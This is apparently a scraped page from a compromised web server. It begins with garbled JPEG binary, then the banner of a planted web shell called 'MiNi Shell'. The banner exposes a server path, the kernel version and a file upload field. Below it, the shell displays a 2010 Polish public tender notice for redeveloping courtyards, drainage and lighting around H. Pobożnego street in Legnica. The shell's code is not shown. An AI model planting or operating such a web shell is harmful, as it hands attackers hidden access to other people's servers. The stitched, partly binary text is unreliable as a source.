JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100716/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100716/190781-N-2010.html

<p class="kh_header"><b>Legnica: Przebudowa zagospodarowania terenu przestrzeni publicznych w rejonie ulicy H. Pobożnego w Legnicy dotyczący programu Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego - zagospodarowanie i utworzenie estetycznych funkcjonalnych przestrzeni publicznych</b><br>
<b>Numer ogłoszenia: 190781 - 2010; data zamieszczenia: 16.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Gospodarki Mieszkaniowej , ul. Zielona 7, 59-220 Legnica, woj. dolnośląskie, tel. 076 7238213, faks 076 7238206.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zgm.legnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa zagospodarowania terenu przestrzeni publicznych w rejonie ulicy H. Pobożnego w Legnicy dotyczący programu Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego - zagospodarowanie i utworzenie estetycznych funkcjonalnych przestrzeni publicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie przebudowy zagospodarowania przestrzeni publicznych między kamienicami publicznymi, wraz z towarzyszącą niezbędną infrastrukturą (przyłącza energetyczne, przyłącza kanalizacji deszczowej); przestrzenie publiczne objęte opracowaniem to wewnętrzne ciągi rekreacyjno-gospodarcze biegnące przez tylne, podwórkowe, części działek objętych opracowaniem, w ramach projektu Odnowa zdegradowanych obszarów miejskich w rejonie ul. H. Pobożnego - zagospodarowanie oraz utworzenie estetycznych i funkcjonalnych przestrzeni publicznych nr umowy o dofinansowanie UDA-RPDS.09.01.00-02-151/09-00 w ramach Priorytetu nr 9 Odnowa zdegradowanych obszarów miejskich na terenie Dolnego Śląska (Miasta), Działania nr 9.1 Odnowa zdegradowanych obszarów miejskich w miastach powyżej 10 tysięcy mieszkańców Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013.	
Szczegóły techniczne wykonania i odbioru poszczególnych robót określa Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych stanowiąca załącznik do SIWZ.

Przedmiot zamówienia obejmuje:
1)ROBOTY BUDOWLANE
Obszar zagospodarowania został podzielony na strefy:
Strefa A obejmuje: działki nr 76, 77, 78, 85, 86, 87,  w rejonie ul. Libana, Kartuskiej a H. Pobożnego - pow. całkowita 722,05 m2
Wykonanie ciągów pieszych jako utwardzone oraz niewielkie ciągi aktywności mieszkańców z ławkami, placem rekreacyjnym, trawnikami, i budynkiem gospodarczym typu G2. Istniejący na dz. nr 86 budynek gospodarczy o wymiarach 2.60m x 3.10m x 2.70m  przeznaczony został do wyburzenia.  
Szczegółowy rozkład wykonania nawierzchni w podziale na rodzaje nawierzchni zawarto na rysunkach zagospodarowania terenu. 

Strefa B obejmuje: działki nr 92, 93, 94, 95, 97, 98/2, 98/1, 99, w rejonie ul. H. Pobożnego -  pow. całkowita 841,11 m2	
Wykonanie ciągów jako piesze utwardzone oraz ciąg aktywności z ławkami, trawnikami, placem rekreacyjnym, stojakami na rowery, placem rekreacyjnym,  zielenią wysoką-klombami, budynkiem gospodarczym typu G3 . Wyburzenie na działce 94 budynku gosp. o wymiarach 6.50 x 14.70 
Szczegółowy rozkład wykonania nawierzchni w podziale na rodzaje nawierzchni zawarto na rysunkach zagospodarowania terenu. 

Strefa C obejmuje: działkę nr 102/2 ,  w rejonie ul. H. pobożnego i Wrocławskiej - pow. całkowita 1718,73 m2
Wykonanie ciągów pieszych jako utwardzone oraz ciąg aktywności z ławkami, trawnikami, stojakami na rowery, placem rekreacyjnym z budynkiem gospodarczym typu G1. Na terenach działek przewiduje się zachowanie istniejącej  zieleni wysokiej. Wymiana nawierzchni i wycinki drzew + rekultywacja.
Szczegółowy rozkład projektowanych nawierzchni w podziale na rodzaje nawierzchni zawarto na rysunkach zagospodarowania terenu. 

Strefa D obejmuje: działki nr 108, 109, 111, 112, 113, 114, 115, 116, 119/4, 832, 835,  w rejonie ul. H. Pobożnego,  Kartuskiej, Przeskok oraz B. Chrobrego - pow. całkowita 1538,99 m2
Wykonanie ciągów pieszych jako utwardzone oraz ciąg aktywności z ławkami, trawnikami, budynkami gospodarczymi typu G2 i G3, stojakami na rowery, placem rekreacyjnym i zielenią wysoką - klonami. Odnowienie ulicznych ogródków.
Na działce 109 wyburzenie budynku gosp. wym. 2.5 x 1.80  
Szczegółowy rozkład projektowanych nawierzchni w podziale na rodzaje nawierzchni zawarto na rysunkach zagospodarowania terenu. 

Strefa E obejmuje: działki nr 122, 123, 124, 125, 126, 127, 128, 130, 131, 132, 133, 825, w rejonie ul. H. Pobożnego, Przeskok, B. Chrobrego, Wrocławskiej - pow. całkowita 1559,85 m2
Wykonanie ciągów pieszych jako utwardzone oraz ciąg aktywności z ławkami, trawnikami, budynkami gospodarczymi typ G2 i G1, stojakami na rowery, placem rekreacyjnym i zielenią wysoką-klonami. Istniejące budynki gospodarcze na dz. nr 122 ,123, 126 ( stykają 6.90 x 2,8 ) dodatkowo na działce 123 7,6 x 2,5 i na działce 126 3 x 3,1   przewiduje się do wyburzenia.  
Szczegółowy rozkład projektowanych nawierzchni w podziale na rodzaje nawierzchni zawarto na rysunkach zagospodarowania terenu. 

Strefa F obejmuje: działki nr 139, 140, 141, 142, 143, 144,145, w rejonie ul. B. Chrobrego, Kartuskiej - pow. całkowita 2015,77 m2
Wykonanie ciągów  pieszych jako utwardzone oraz ciąg aktywności z ławkami, trawnikiem, budynkiem gospodarczym typu G1, placem rekreacyjnym i zielenią wysoką-klonami. Dodatkowo, ze względu na otwarcie od strony wschodniej kwartału planuje się wybudowanie niepełnowymiarowego boiska do gry w koszykówkę z pojedynczym koszem bez piłkołapu. Umocnienie skarpy od strony ulicy Poniatowskiego. Od strony ulicy przewiduje się rewitalizację istniejących ogródków 
Szczegółowy rozkład projektowanych nawierzchni w podziale na rodzaje nawierzchni zawarto na rysunkach zagospodarowania terenu. 

KANALIZACJA DESZCZOWA
Strefa A:
Przyjmuje się , że kanalizację deszczową należy wpiąć do pozostawionych trójników ul. H. Pobożnego  i B. Chrobrego.
Przedmiotowa kanalizacja będzie odwadniać wewnętrzne podwórka oraz zbieranie wód opadowych z połaci dachowych. Przyjęto w/w kanalizację z rur DN 200 kamionkowych kielichowych .
Od pozostawionego przyłącza w/g opracowania do pierwszej studzienki poza pasem drogowym, zakończyć studzienką o śr  800 D31, D30, D29, D28, ( kręgi betonowe ) z osadnikiem min. 0,5 m oraz wykonać studzienkę ściekową o śr. 500 mm z osadnikiem syfonem wp23, wp24, wp25, wp26, wp27, wp28,. 
Dalsza część kanalizacji deszczowej od studni wykonać z rur PVC 200 i PVC 150 o klasie S łączonych na uszczelkę.

Strefa  B:
Przyjmuje się , że kanalizację deszczową należy wpiąć do pozostawionych trójników ul. H. Pobożnego  i B. Chrobrego.
Przedmiotowa kanalizacja będzie odwadniać wewnętrzne podwórka oraz zbieranie wód opadowych z połaci dachowych. Przyjęto w/w kanalizację z rur DN 200 kamionkowych kielichowych.
Od pozostawionego przyłącza w/g opracowania do pierwszej studzienki poza pasem drogowym, zakończyć studzienką o śr.  800 D14, D15, D16, D17, D18 ( kręgi betonowe ) z osadnikiem min. 0,5 m oraz wykonać studzienkę ściekową o śr. 500 mm z osadnikiem syfonem wp22, wp20, wp19, wp18, wp17, wp16, wp15. 
Dalsza część kanalizacji deszczowej od studni wykonać z rur PVC 200 i PVC 150 o klasie S łączonych na uszczelkę.

Strefa C:
Przyjmuje się , że kanalizację deszczową należy wpiąć do pozostawionych trójników ul. H. Pobożnego  i B. Chrobrego.
Przedmiotowa kanalizacja będzie odwadniać wewnętrzne podwórka oraz zbieranie wód opadowych z połaci dachowych. Przyjęto w/w kanalizację z rur DN 200 kamionkowych kielichowych .
Od pozostawionego przyłącza w/g opracowania do pierwszej studzienki poza pasem drogowym, zakończyć studzienką DN 800 D14,D15, D16, D17, D18, , ( kręgi betonowe ) z osadnikiem min. 0,5 m oraz wykonać studzienkę ściekową o śr. 500 mm z osadnikiem syfonem wp14. 
Dalsza część kanalizacji deszczowej od studni wykonać z rur PVC 200 i PVC 150 o klasie S łączonych na uszczelkę.

Strefa D:
Przyjmuje się , że kanalizację deszczową należy wpiąć do pozostawionych trójników ul. H. Pobożnego  i B. Chrobrego.
Przedmiotowa kanalizacja będzie odwadniać wewnętrzne podwórka oraz zbieranie wód opadowych z połaci dachowych. Przyjęto w/w kanalizację z rur DN 200 kamionkowych kielichowych.
Od pozostawionego przyłącza w/g opracowania do pierwszej studzienki poza pasem drogowym, zakończyć studzienką o śr. 800 D4,D5, D6, D7, D8, D9 D29, D10 (kręgi betonowe) z osadnikiem min. 0,5 m oraz wykonać studzienkę ściekową o śr. 500 mm z osadnikiem syfonem wp2,  wp3, wp4, wp5, wp6, wp7, wp8.
Dalsza część kanalizacji deszczowej od studni wykonać z rur PVC 200 i PVC 150 o klasie S łączonych na uszczelkę.

Strefa E:
Przyjmuje się , że kanalizację deszczową należy wpiąć do pozostawionych trójników ul. H. Pobożnego  i B. Chrobrego.
Przedmiotowa kanalizacja będzie odwadniać wewnętrzne podwórka oraz zbieranie wód opadowych z połaci dachowych. Przyjęto w/w kanalizację z rur DN 200 kamionkowych kielichowych.
Od pozostawionego przyłącza w/g opracowania do pierwszej studzienki poza pasem drogowym, zakończyć studzienką o śr. 800 D10.1, D10.2, D11, D12, D12, D13, D13, D13.1, (kręgi betonowe) z osadnikiem min. 0,5 m oraz wykonać studzienkę ściekową o śr. 500 mm z osadnikiem syfonem wp9,  wp10, wp11, wp12, wp13.
Dalsza część kanalizacji deszczowej od studni wykonać z rur PVC 200 i PVC 150 o klasie S łączonych na uszczelkę.

Strefa F:
Przyjmuje się , że kanalizację deszczową należy wpiąć do pozostawionych trójników ul. H. Pobożnego  i B. Chrobrego.
Przedmiotowa kanalizacja: będzie odwadniać wewnętrzne podwórka oraz zbieranie wód opadowych z połaci dachowych. Przyjęto w/w kanalizację z rur DN 200 kamionkowych kielichowych.
Od pozostawionego przyłącza w/g opracowania do pierwszej studzienki poza pasem drogowym, zakończyć studzienką o śr. 800 D1, D1.1, D3, D3.1 ( kręgi betonowe ) z osadnikiem min. 0,5 m oraz wykonać studzienkę ściekową o śr. 500 mm z osadnikiem syfonem wp1.
Dalsza część kanalizacji deszczowej od studni wykonać z rur PVC 200 i PVC 150 o klasie S łączonych na uszczelkę.

3)ROBOTY ELEKTRYCZNE
Strefa A

1. Zakres wykonania
- wybudowanie rozdziału WLZ - tów	2 szt.
- zabudowę szafki sterującej oświetleniem	2 szt.
- ustawienie nowych słupów oświetleniowych	3 szt.
- zainstalowanie lamp na nowych słupach oświetleniowych	3 szt.
- zasilane oświetlenia budynku gospodarczego	1 szt.
- ułożenie kabla oświetleniowego	73 m

2. Zasilanie i sterowanie
Zasilanie projektowanego oświetlenia zgodnie z warunkami przyłączenia należy wykonać z:
- istniejącej instalacji zasilającej budynku przy ul. Henryka Pobożnego 14
- istniejącej instalacji zasilającej budynku przy ul. Kartuskiej 5
Zaprojektowano rozdział WLZ - tów w dogodnym miejscu obok zabezpieczenia przelicznikowego budynku zgodnie ze schematem przedstawionym na rys. 2 i 3
W każdym z przypadków należy zabudować szafkę dzieloną z estroduru. W lewej części szafki należy zabudować dwie podstawy bezpiecznikowe typu SLP-00. Z jednego zabezpieczenia należy zasilić istniejącą rozdzielnicę główną budynku, z drugiego projektowaną szafkę sterującą oświetleniem.
W prawej części szafki należy umieścić licznik jednofazowy oraz zabezpieczenie przelicznikowe zgodnie z warunkami przyłączenia 1 x 6A. W drzwiach szafki należy przewidzieć okienko odczytowe w celu umożliwienia pracownikowi Energia Pro odczytu stanu licznika bez otwierania szafki. 
Obok rozdziału WLZ - tów oraz pomiaru należy zabudować szafkę sterującą oświetleniem zgodnie ze schematem przedstawionym na rys. 2 i 3. Szafka powinna być wyposażona w oświetlenie dla celów serwisowych, gniazdo serwisowe, zegar astronomiczny typu CPA sterujący oświetleniem oraz przełącznik umożliwiający przełączanie sterowania z ręcznego na automatyczne. 

3. Konstrukcje wsporcze i oprawy oświetleniowe
Do oświetlenia terenów publicznych zastosowano słupy oświetleniowe parkowe typu AVISO o wysokości 5,2m montowane w gruncie z oprawami o mocy 150W i odbłyśnikiem koloru białego.
Każdą latarnię należy wyposażyć w tabliczkę bezpiecznikową 4A np. produkcji ROSA. Każdą oprawę zasilić przewodem YDY 3x2,5mm2/750V.

Strefa B
1. Zakres wykonania
- wybudowanie rozdziału WLZ - tów	1 szt.
- zabudowę szafki sterującej oświetleniem	1 szt.
- ustawienie nowych słupów oświetleniowych	3 szt.
- zainstalowanie lamp na nowych słupach oświetleniowych	3 szt.
- zasilane oświetlenia budynku gospodarczego	2 szt.
- ułożenie kabla oświetleniowego	94,5 m

2. Zasilanie i sterowanie
Zasilanie projektowanego oświetlenia zgodnie z warunkami przyłączenia należy wykonać z istniejącej instalacji zasilającej budynku przy ul. Henryka Pobożnego 18B.
Zaprojektowano rozdział WLZ - tów w dogodnym miejscu obok zabezpieczenia przelicznikowego budynku zgodnie ze schematem przedstawionym na rys. 2.
Należy zabudować szafkę dzieloną z estroduru. W lewej części szafki należy zabudować dwie podstawy bezpiecznikowe typu SLP-00. Z jednego zabezpieczenia należy zasilić istniejącą rozdzielnicę główną budynku, z drugiego projektowaną szafkę sterującą oświetleniem.
W prawej części szafki należy umieścić licznik jednofazowy oraz zabezpieczenie przelicznikowe zgodnie z warunkami przyłączenia 1 x 6A. W drzwiach szafki należy przewidzieć okienko odczytowe w celu umożliwienia pracownikowi Energia Pro odczytu stanu licznika bez otwierania szafki. 
Obok rozdziału WLZ - tów oraz pomiaru należy zabudować szafkę sterującą oświetleniem zgodnie ze schematem przedstawionym na rys. 2. Szafka powinna być wyposażona w oświetlenie dla celów serwisowych, gniazdo serwisowe, zegar astronomiczny typu CPA sterujący oświetleniem oraz przełącznik umożliwiający przełączanie sterowania z ręcznego na automatyczne.

3. Konstrukcje wsporcze i oprawy oświetleniowe
Do oświetlenia terenów publicznych zastosowano słupy oświetleniowe parkowe typu AVISO o wysokości 5,2m montowane w gruncie z oprawami o mocy 150W i odbłyśnikiem koloru białego.
Każdą latarnię należy wyposażyć w tabliczkę bezpiecznikową 4A np. produkcji ROSA. Każdą oprawę zasilić przewodem YDY 3x2,5mm2/750V.
Dodatkowo z szafki sterującej należy zasilić oświetlenie budynku gospodarczego.
W budynku gospodarczym oświetlenie załączane ma być na czujkę ruchu.

Strefa C
1. Zakres wykonania:
- wybudowanie rozdziału WLZ - ów	1 szt.
- zabudowę szafki sterującej oświetleniem	1 szt.
- zabudowę lamp do iluminacji terenów zielonych	4 szt.
- zasilane oświetlenia budynku gospodarczego	2 szt.
- ułożenie kabla oświetleniowego	143,5 m

2. Zasilanie i sterowanie

Zasilanie projektowanego oświetlenia zgodnie z warunkami przyłączenia należy wykonać z istniejącej instalacji zasilającej budynku przy ul. Henryka Pobożnego 22.
Zaprojektowano rozdział WLZ - tów w dogodnym miejscu obok zabezpieczenia przelicznikowego budynku zgodnie ze schematem przedstawionym na rys. 2.
Należy zabudować szafkę dzieloną z estroduru. W lewej części szafki należy zabudować dwie podstawy bezpiecznikowe typu SLP-00. Z jednego zabezpieczenia należy zasilić istniejącą rozdzielnicę główną budynku, z drugiego projektowaną szafkę sterującą oświetleniem.
W prawej części szafki należy umieścić licznik jednofazowy oraz zabezpieczenie przelicznikowe zgodnie z warunkami przyłączenia 1 x 10A. W drzwiach szafki należy przewidzieć okienko odczytowe w celu umożliwienia pracownikowi Energia Pro odczytu stanu licznika bez otwierania szafki. 
Obok rozdziału WLZ - tów oraz pomiaru należy zabudować szafkę sterującą oświetleniem zgodnie ze schematem przedstawionym na rys. 2. Szafka powinna być wyposażona w oświetlenie dla celów serwisowych, gniazdo serwisowe, zegar astronomiczny typu CPA sterujący oświetleniem oraz przełącznik umożliwiający przełączanie sterowania z ręcznego na automatyczne.

3. Konstrukcje wsporcze i oprawy oświetleniowe
Do iluminacji terenów zielonych zastosowano lampy zamontowane w nawierzchni typu E/Fact o mocy 18W
W obwodzie z iluminacją zaprojektowano oświetlenie budynku gospodarczego.
W budynku gospodarczym oświetlenie załączane ma być na czujkę ruchu.

Strefa D
1. Zakres wykonania:
- wybudowanie rozdziału WLZ - ów	1 szt.
- zabudowę szafki sterującej oświetleniem	1 szt.
- ustawienie nowych słupów oświetleniowych	3 szt.
- zainstalowanie lamp na nowych słupach oświetleniowych	3 szt.
- zabudowę lamp do iluminacji terenów zielonych	3 szt.
- zasilane oświetlenia budynku gospodarczego	2 szt.
- ułożenie kabla oświetleniowego	138,5 m

2. Zasilanie i sterowanie
Zasilanie projektowanego oświetlenia zgodnie z warunkami przyłączenia należy wykonać z istniejącej instalacji zasilającej budynku przy ul. Bolesława Chrobrego 4.
Zaprojektowano rozdział WLZ - tów w dogodnym miejscu obok zabezpieczenia przelicznikowego budynku zgodnie ze schematem przedstawionym na rys. 2.
Należy zabudować szafkę dzieloną z estroduru. W lewej części szafki należy zabudować dwie podstawy bezpiecznikowe typu SLP-00. Z jednego zabezpieczenia należy zasilić istniejącą rozdzielnicę główną budynku, z drugiego projektowaną szafkę sterującą oświetleniem.
W prawej części szafki należy umieścić licznik jednofazowy oraz zabezpieczenie przelicznikowe zgodnie z warunkami przyłączenia 1 x 10A. W drzwiach szafki należy przewidzieć okienko odczytowe w celu umożliwienia pracownikowi Energia Pro odczytu stanu licznika bez otwierania szafki. 
Obok rozdziału WLZ - tów oraz pomiaru należy zabudować szafkę sterującą oświetleniem zgodnie ze schematem przedstawionym na rys. 2. Szafka powinna być wyposażona w oświetlenie dla celów serwisowych, gniazdo serwisowe, zegar astronomiczny typu CPA sterujący oświetleniem oraz przełącznik umożliwiający przełączanie sterowania z ręcznego na automatyczne.

3. Konstrukcje wsporcze i oprawy oświetleniowe
Do oświetlenia terenów publicznych zastosowano słupy oświetleniowe parkowe typu AVISO o wysokości 5,2m montowane w gruncie z oprawami o mocy 150W i odbłyśnikiem koloru białego.
Każdą latarnię należy wyposażyć w tabliczkę bezpiecznikową 4A np. produkcji ROSA. Każdą oprawę zasilić przewodem YDY 3x2,5mm2/750V.
Ze słupów oświetleniowych nr 1 i 3 należy zasilić oświetlenie budynku gospodarczego.
W budynku gospodarczym oświetlenie załączane ma być na czujkę ruchu.
Do iluminacji terenów zielonych zastosowano lampy zamontowane w nawierzchni typu E/Fact o mocy 18W

Strefa E
1. Zakres wykonania:
- wybudowanie rozdziału WLZ - tów	1 szt.
- zabudowę szafki sterującej oświetleniem	1 szt.
- ustawienie nowych słupów oświetleniowych	3 szt.
- zainstalowanie lamp na nowych słupach oświetleniowych	3 szt.
- zabudowę lamp do iluminacji terenów zielonych	2 szt.
- zasilane oświetlenia budynku gospodarczego	2 szt.
- ułożenie kabla oświetleniowego	153,5 m

2. Zasilanie i sterowanie
Zasilanie projektowanego oświetlenia zgodnie z warunkami przyłączenia należy wykonać z istniejącej instalacji zasilającej budynku przy ul. Bolesława Chrobrego 9.
Zaprojektowano rozdział WLZ - tów w dogodnym miejscu obok zabezpieczenia przelicznikowego budynku zgodnie ze schematem przedstawionym na rys. 2.
Należy zabudować szafkę dzieloną z estroduru. W lewej części szafki należy zabudować dwie podstawy bezpiecznikowe typu SLP-00. Z jednego zabezpieczenia należy zasilić istniejącą rozdzielnicę główną budynku, z drugiego projektowaną szafkę sterującą oświetleniem.
W prawej części szafki należy umieścić licznik jednofazowy oraz zabezpieczenie przelicznikowe zgodnie z warunkami przyłączenia 1 x 10A. W drzwiach szafki należy przewidzieć okienko odczytowe w celu umożliwienia pracownikowi Energia Pro odczytu stanu licznika bez otwierania szafki. 
Obok rozdziału WLZ - tów oraz pomiaru należy zabudować szafkę sterującą oświetleniem zgodnie ze schematem przedstawionym na rys. 2. Szafka powinna być wyposażona w oświetlenie dla celów serwisowych, gniazdo serwisowe, zegar astronomiczny typu CPA sterujący oświetleniem oraz przełącznik umożliwiający przełączanie sterowania z ręcznego na automatyczne.

3. Konstrukcje wsporcze i oprawy oświetleniowe
Do oświetlenia terenów publicznych zastosowano słupy oświetleniowe parkowe typu AVISO o wysokości 5,2m montowane w gruncie z oprawami o mocy 150W i odbłyśnikiem koloru białego.
Każdą latarnię należy wyposażyć w tabliczkę bezpiecznikową 4A np. produkcji ROSA. Każdą oprawę zasilić przewodem YDY 3x2,5mm2/750V.
Ze słupów oświetleniowych nr 1 i 3 należy zasilić oświetlenie budynku gospodarczego.
W budynku gospodarczym oświetlenie załączane ma być na czujkę ruchu.
Do iluminacji terenów zielonych zastosowano lampy zamontowane w nawierzchni typu E/Fact o mocy 18W

Strefa F
1. Zakres wykonania :
- wybudowanie rozdziału WLZ - tów	1 szt.
- zabudowę szafki sterującej oświetleniem	1 szt.
- ustawienie nowych słupów oświetleniowych	2 szt.
- zainstalowanie lamp na nowych słupach oświetleniowych	3 szt.
- zasilane oświetlenia budynku gospodarczego	1 szt.
- ułożenie kabla oświetleniowego	45,5 m

2. Zasilanie i sterowanie
Zasilanie projektowanego oświetlenia zgodnie z warunkami przyłączenia należy wykonać z istniejącej instalacji zasilającej budynku przy ul. Bolesława Chrobrego 16.
Zaprojektowano rozdział WLZ - tów w dogodnym miejscu obok zabezpieczenia przelicznikowego budynku zgodnie ze schematem przedstawionym na rys. 2.
Należy zabudować szafkę dzieloną z estroduru. W lewej części szafki należy zabudować dwie podstawy bezpiecznikowe typu SLP-00. Z jednego zabezpieczenia należy zasilić istniejącą rozdzielnicę główną budynku, z drugiego projektowaną szafkę sterującą oświetleniem.
W prawej części szafki należy umieścić licznik jednofazowy oraz zabezpieczenie przelicznikowe zgodnie z warunkami przyłączenia 1 x 10A. W drzwiach szafki należy przewidzieć okienko odczytowe w celu umożliwienia pracownikowi Energia Pro odczytu stanu licznika bez otwierania szafki. 
Obok rozdziału WLZ - tów oraz pomiaru należy zabudować szafkę sterującą oświetleniem zgodnie ze schematem przedstawionym na rys. 2. Szafka powinna być wyposażona w oświetlenie dla celów serwisowych, gniazdo serwisowe, zegar astronomiczny typu CPA sterujący oświetleniem oraz przełącznik umożliwiający przełączanie sterowania z ręcznego na automatyczne.

3. Konstrukcje wsporcze i oprawy oświetleniowe
Do oświetlenia terenów publicznych zastosowano słupy oświetleniowe parkowe typu AVISO o wysokości 5,2m montowane w gruncie z oprawami o mocy 150W i odbłyśnikiem koloru białego.
Każdą latarnię należy wyposażyć w tabliczkę bezpiecznikową 4A np. produkcji ROSA. Każdą oprawę zasilić przewodem YDY 3x2,5mm2/750V.
Ze słupów oświetleniowych nr 2 należy zasilić oświetlenie budynku gospodarczego.
W budynku gospodarczym oświetlenie załączane ma być na czujkę ruchu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.11.10.00-8, 45.11.13.00-1, 45.11.27.10-5, 45.21.22.00-8, 45.23.24.60-4, 45.26.26.00-7, 45.23.24.51-8, 45.31.00.00-3, 45.31.43.00-4, 45.31.53.00-1, 45.31.61.00-6.</p>
